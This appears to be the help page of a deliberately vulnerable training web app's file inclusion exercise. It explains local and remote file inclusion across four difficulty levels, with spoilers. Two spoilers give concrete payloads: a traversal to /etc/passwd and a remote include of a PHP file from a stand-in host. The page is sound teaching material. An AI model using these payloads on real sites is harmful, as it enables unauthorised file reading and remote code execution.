AboutSome web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server. At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing the potential for malicious file execution. If the file chosen to be included is local on the target machine, it is called "Local File Inclusion (LFI). But files may also be included on other machines, which then the attack is a "Remote File Inclusion (RFI). When RFI is not an option. using another vulnerability with LFI (such as file upload and directory traversal) can often achieve the same effect. Note, the term "file inclusion" is not the same as "arbitrary file access" or "file disclosure". ObjectiveRead all five famous quotes from '../hackable/flags/fi.php' using only the file inclusion. Low LevelThis allows for direct input into one of many PHP functions that will include the content when executing. Depending on the web service configuration will depend if RFI is a possibility. Spoiler: LFI: ?page=../../../../../../etc/passwd. Spoiler: RFI: ?page=http://www.evilsite.com/evil.php. Medium LevelThe developer has read up on some of the issues with LFI/RFI, and decided to filter the input. However, the patterns that are used, isn't enough. Spoiler: LFI: Possible, due to it only cycling through the pattern matching once. Spoiler: RFI: . High LevelThe developer has had enough. They decided to only allow certain files to be used. However as there are multiple files with the same basename, they use a wildcard to include them all. Spoiler: LFI: The filename only has start with a certain value.. Spoiler: RFI: Need to link in another vulnerability, such as file upload. Impossible LevelThe developer calls it quits and hardcodes only the allowed pages, with there exact filenames. By doing this, it removes all avenues of attack. |
Reference: